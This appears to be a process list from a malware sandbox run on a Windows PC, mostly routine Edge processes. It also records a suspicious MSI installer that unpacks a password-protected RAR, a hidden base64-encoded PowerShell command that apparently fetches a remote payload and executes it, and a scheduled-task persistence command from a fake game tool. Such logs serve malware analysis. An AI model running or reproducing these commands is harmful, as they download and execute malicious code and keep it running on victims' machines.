C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=7744 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7504 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=1992 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6856 /prefetch:8

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\desktop-1920x1080.jpg" /ForceBootstrapPaint3D

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\desktop-1920x1080.jpg" /ForceBootstrapPaint3D

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1748 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5892 /prefetch:8

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\_x64__x32__installer__.zip"

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\x64__installer__v2.0.5.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A4E1F0BDBC29017E2BAFA3A41C9F21D9

C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\UnRAR.exe

"C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\"

C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\rnpkeys.exe

"C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\rnpkeys.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe explorer.exe

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\x64__installer__v2.0.5.msi"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 28D303C2E11E68AD8D1F8225C1D3F397

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AdAB3AG8ALQByAG8AbwB0AC4AYwBvAG0ALwAyADQAMAA3AC4AYgBzADYANAAiACkAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAHgAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBzAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIgBiACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAIgAsACIAaAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAkACIALAAiAG0AIgApAC4AUgBlAHAAbABhAGMAZQAoACIAJQAiACwAIgBwACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAF4AIgAsACIAdgAiACkAKQA7AGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJAB4AC4AQwBvAHUAbgB0ADsAJABpACsAKwApAHsAJAB4AFsAJABpAF0APQAgACgAJAB4AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADYANwApACAALQBiAHgAbwByACAAMQA4AH0AOwBpAGUAeAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAeAApACkA

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb3f8746f8,0x7ffb3f874708,0x7ffb3f874718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=audio --mojo-platform-channel-handle=5644 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=video_capture --mojo-platform-channel-handle=4052 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6296 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6296 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=collections --mojo-platform-channel-handle=3592 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=4012 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6076 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2052 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\0680d99cd3e9932de4429d04bbbf6032e8b670700d70d758d9377e899552fc9a.zip"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\dd7893c7eed9662f479225efff35609cf555c810c5cb0b1e316af2b2e88131ac.zip"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6700 /prefetch:2

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\dd7893c7eed9662f479225efff35609cf555c810c5cb0b1e316af2b2e88131ac.zip"

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\document.rtf" /o ""

C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe

"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Server-Host" /tr '"C:\Users\Admin\AppData\Roaming\Server-Host.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEDDD.tmp.bat""

C:\Windows\SysWOW64\schtasks.exe

